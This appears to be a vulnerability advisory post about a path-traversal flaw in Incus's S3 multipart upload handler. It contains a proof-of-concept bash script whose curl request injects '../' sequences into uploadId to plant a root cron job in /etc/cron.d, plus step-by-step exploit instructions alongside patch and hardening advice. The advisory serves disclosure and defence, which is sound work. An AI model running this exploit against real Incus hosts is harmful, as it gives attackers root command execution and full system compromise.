Listen to this Post
How CVE-2026-XXXXX Works
The vulnerability resides in Incus’s S3‑compatible storage endpoint, specifically in the multipart upload handler. When a client initiates a multipart upload, the server generates a unique upload ID and creates a directory under the uploads root using that ID. Later, when the client uploads a part, the `uploadPart` function retrieves the `uploadId` directly from the request query string and passes it to s.uploadDir(), which constructs the path as filepath.Join(s.uploadsDir(), uploadID). No sanitization or validation is performed on the `uploadId` value before it is used in the filesystem path.
An attacker can supply a malicious `uploadId` containing path‑traversal sequences (e.g., ../../../../etc/cron.d) to force the server to write the uploaded part outside the intended uploads directory. Because the part is written with a predictable name (part-00001), the attacker can place arbitrary content into arbitrary locations on the host filesystem. The server runs as root, so any file can be overwritten or created, including cron jobs, SSH keys, or system binaries. This ultimately leads to arbitrary command execution with root privileges.
The issue is rooted in the lack of input validation in the multipart upload flow; the upload ID is treated as a trusted path component, enabling directory traversal attacks that bypass all directory restrictions.
DailyCVE Form
| Field | Value |
|–|–|
| Platform | Incus (Linux Containers) |
| Version | prior to 6.23.0 |
| Vulnerability | Path Traversal (CWE‑22) |
| Severity | Critical (CVSS 9.6) |
| Date | 2026‑06‑26 |
| Prediction | Patch expected 2026‑07‑10 |
What Undercode Say (Analytics)
Enable S3 API and create a bucket
incus config set core.storage_buckets_address=:8555
incus storage volume create default bucket
PoC script (abridged)
!/usr/bin/env bash
endpoint="http://localhost:8555"
bucket="default"
access="<ACCESS_KEY>"
secret="<SECRET_KEY>"
upload_id="../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/cron.d"
Construct the malicious S3 PUT request with AWS Signature V4
The upload_id is injected into the query string; the server writes part-00001 to /etc/cron.d/
curl -X PUT "${endpoint}/${bucket}/anything?partNumber=1&uploadId=${upload_id//\//%2F}" \
-H "Host: ${host}" \
-H "X-Amz-Date: ${amz_date}" \
-H "X-Amz-Content-Sha256: ${body_hash}" \
-H "Authorization: ${auth}" \
--data-binary " root /bin/sh -c 'id > /incus-s3-rce; rm -f /etc/cron.d/part-00001'"
Code Snippet (Vulnerable Line):
// internal/server/storage/s3/local/multipart.go
func (s Server) uploadDir(uploadID string) string {
return filepath.Join(s.uploadsDir(), uploadID) // No sanitization of uploadID
}
The `uploadID` is taken directly from the request and used to build the filesystem path, enabling directory traversal.
Exploit
- Prerequisite: The attacker must have valid S3 credentials (access key and secret) for the Incus bucket.
- Craft Request: Send a `PUT` request to the multipart upload endpoint with a `partNumber` and a malicious `uploadId` containing `../` sequences.
- Write Payload: The server writes the uploaded part (e.g.,
part-00001) to the traversed path (e.g.,/etc/cron.d/part-00001). - Trigger Execution: If the written file is a cron job, it will be executed by the system scheduler, granting the attacker root‑level command execution.
Protection
- Upgrade Incus to version 6.23.0 or later, which includes a fix for this vulnerability.
- Validate and sanitize all user‑supplied path components (e.g.,
uploadId) to reject..,/, and other dangerous sequences. - Restrict S3 API access to trusted networks and users only; use firewall rules or network policies.
- Run the Incus daemon with the least privilege necessary (avoid running as root if possible).
- Monitor filesystem for unexpected writes to sensitive directories (e.g.,
/etc/cron.d,/root/.ssh).
Impact
- Arbitrary File Write: An attacker can write or overwrite any file on the host filesystem as root.
- Privilege Escalation: By writing to cron directories, SSH authorized_keys, or systemd service files, the attacker can gain persistent root access.
- Denial of Service: Overwriting critical system files or configuration can render the host unbootable or unstable.
- Full System Compromise: The ability to write arbitrary files ultimately leads to arbitrary command execution and complete control over the host system.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
